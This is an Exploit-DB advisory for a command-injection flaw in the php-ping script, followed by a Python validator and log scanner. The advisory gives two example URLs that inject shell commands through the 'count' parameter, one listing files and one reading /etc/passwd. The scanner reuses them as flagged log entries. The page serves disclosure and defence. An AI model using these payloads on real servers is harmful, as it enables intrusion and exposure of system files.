Exploit PHP-ping - 'Count' Command Execution

Exploiter

18 Dec 2022
EDB-ID: 23487
EDB verification: Passed
Author: PPP-DESIGN
Vulnerability type: WEBAPPS
Platform: PHP
CVE: null
Publication date: 2003-12-29
Code:
source: https://www.securityfocus.com/bid/9309/info

It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell metacharacters via the 'count' parameter of the php-ping.php script.

Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software. 

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
 
Source
www.exploit-db.com
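
An added example, not part of the original advisory and not php-ping's own code: a Python sketch of the strict integer check that the 'count' parameter lacked, applied to web access logs to find requests like the two quoted above. The log lines are constructed, and `MAX_COUNT` and the access-log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

MAX_COUNT = 10  # assumed upper bound; set it to what the deployment allows
_COUNT_RE = re.compile(r"[0-9]{1,3}")  # ASCII digits only, no sign, no whitespace

def validate_count(raw):
    """Return count as an int, or None if it is not a plain bounded integer."""
    if not isinstance(raw, str) or not _COUNT_RE.fullmatch(raw):
        return None
    value = int(raw)
    return value if 1 <= value <= MAX_COUNT else None

def suspicious_requests(log_lines, script="php-ping.php"):
    """Return (client, decoded count) for requests whose count fails validation."""
    hits = []
    for line in log_lines:
        m = re.match(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET
        for raw in parse_qs(url.query, keep_blank_values=True).get("count", []):
            if validate_count(raw) is None:
                hits.append((client, raw))
    return hits

# Constructed access-log lines; the flagged requests reuse the query strings quoted above.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Dec/2003:10:00:01 +0000] '
    '"GET /php-ping.php?count=4&submit=Ping%21 HTTP/1.0" 200 512',
    '192.0.2.77 - - [29/Dec/2003:10:00:05 +0000] '
    '"GET /php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21 HTTP/1.0" 200 2048',
    '192.0.2.77 - - [29/Dec/2003:10:00:09 +0000] '
    '"GET /php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21 HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric count: {value!r}")
```

The same allow-list check (digits only, bounded range) belongs in the script itself before the value reaches any shell command; filtering individual metacharacters is not a substitute.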